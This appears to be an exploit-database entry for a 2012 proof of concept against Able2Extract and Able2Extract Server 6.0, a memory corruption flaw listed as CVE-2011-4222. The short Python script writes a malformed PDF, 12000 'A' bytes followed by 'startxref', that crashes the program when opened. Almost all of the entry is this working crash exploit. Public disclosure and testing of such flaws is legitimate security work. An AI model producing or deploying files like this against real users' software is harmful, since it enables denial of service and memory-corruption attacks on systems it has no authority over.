doswindowspython
Able2Extract and Able2Extract Server 6.0 - Memory Corruption
Able2Extract and Able2Extract Server 6.0 - Memory Corruption
Published on 2012-06-25
Source code
Pinned to commit 7eac4c3a2ce5pythonplatforms/windows/dos/19392.py7eac4c3a
raw # Exploit Title: Able2Extract and Able2Extract Server v 6.0 Memory
Corruption
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:6.0
# Tested on: Windows 7
# CVE : cve-2011-4222
payload ="A"*12000
crash="startxref"
pdf=payload+crash
filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()